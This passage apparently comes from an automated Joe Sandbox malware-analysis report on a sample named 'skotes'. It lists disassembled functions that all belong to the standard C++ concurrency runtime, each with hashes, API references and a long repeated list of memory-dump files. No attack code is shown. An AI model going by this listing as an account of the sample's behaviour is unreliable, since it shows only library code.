                                                                                                                                            • Opcode Fuzzy Hash: d03c5ec78cdc4f8d47eaecd6ab8c40b9ad2487bf1fcf43a1197f166b98510039
                                                                                                                                            • Instruction Fuzzy Hash: 75319C72D01696DFCB14EFA5D6816DDBBB1BF04718F24006AD80A7B652CB39AD04CB90
                                                                                                                                            APIs
                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00AF18A4
                                                                                                                                            • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00AF18EB
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                                            • String ID: pContext
                                                                                                                                            • API String ID: 3390424672-2046700901
                                                                                                                                            • Opcode ID: 316c098acd30efad083e4d1835e115916e6df4e28da52944d32ff72452aacb1d
                                                                                                                                            • Instruction ID: 0ab91be4ec2532a93fa36a2e85b1cc945eecc08c5a9c4e70dd6d66a95aa65048
                                                                                                                                            • Opcode Fuzzy Hash: 316c098acd30efad083e4d1835e115916e6df4e28da52944d32ff72452aacb1d
                                                                                                                                            • Instruction Fuzzy Hash: 6B21F735B00619DBCB14ABE8D995ABDB3B5BF94374B04016AF611872D1CFB4AC41CBD0
                                                                                                                                            APIs
                                                                                                                                            • List.LIBCONCRT ref: 00AEAEEA
                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00AEAF0F
                                                                                                                                            • Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 00AEAF4E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
                                                                                                                                            • String ID: pExecutionResource
                                                                                                                                            • API String ID: 1772865662-359481074
                                                                                                                                            • Opcode ID: 4039b6231d3c94d785609b81a374d20cb8e1e76948df7c94dbd70742c143cf57
                                                                                                                                            • Instruction ID: 0ebaab621ad2ac113bb7a9edf662b4ecff7beac57bbbea652cf00857f20b81d9
                                                                                                                                            • Opcode Fuzzy Hash: 4039b6231d3c94d785609b81a374d20cb8e1e76948df7c94dbd70742c143cf57
                                                                                                                                            • Instruction Fuzzy Hash: A321F875A402059BCB08EFA4C952BEDB7E5BF48310F104069F506AB792DBB0AE01CB95
                                                                                                                                            APIs
                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00AE4F24
                                                                                                                                            • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00AE4F66
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CacheGroupLocalSchedule$Concurrency::details::SegmentSegment::std::invalid_argument::invalid_argument
                                                                                                                                            • String ID: count$ppVirtualProcessorRoots
                                                                                                                                            • API String ID: 2663199487-3650809737
                                                                                                                                            • Opcode ID: 1b7aa2e57a37ea893de88062f9193fc37ac00fa11c3b471eae83a6135e5c37a4
                                                                                                                                            • Instruction ID: 8d337f60d083d55634a17305f6434e33846f3fdc8edc7f7c9111d32a0a9a5835
                                                                                                                                            • Opcode Fuzzy Hash: 1b7aa2e57a37ea893de88062f9193fc37ac00fa11c3b471eae83a6135e5c37a4
                                                                                                                                            • Instruction Fuzzy Hash: 7C21BE35600215EFCB14EFA9C992EAD77B9BF48310F40406AF5069B792DB71AE02CB91
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00AEBA0E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                                                            • String ID: RoInitialize$RoUninitialize$combase.dll
                                                                                                                                            • API String ID: 348560076-3997890769
                                                                                                                                            • Opcode ID: c36340ae7cba73b7399edd083bbc63eda5430cddfaf9d1a13c8f35b2ef3c3231
                                                                                                                                            • Instruction ID: ce303b34630c0162996120878aa2d3a33eaf00020b96d5bed622796341de2519
                                                                                                                                            • Opcode Fuzzy Hash: c36340ae7cba73b7399edd083bbc63eda5430cddfaf9d1a13c8f35b2ef3c3231
                                                                                                                                            • Instruction Fuzzy Hash: D101D272AA13919EDB20BBBA5C0DABB359C9F01340F605C69A640E7182EFB5C40246B5
                                                                                                                                            APIs
                                                                                                                                            • SafeRWList.LIBCONCRT ref: 00AE6E73
                                                                                                                                              • Part of subcall function 00AE4E6E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00AE4E7F
                                                                                                                                              • Part of subcall function 00AE4E6E: List.LIBCMT ref: 00AE4E89
                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00AE6E85
                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00AE6EAA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
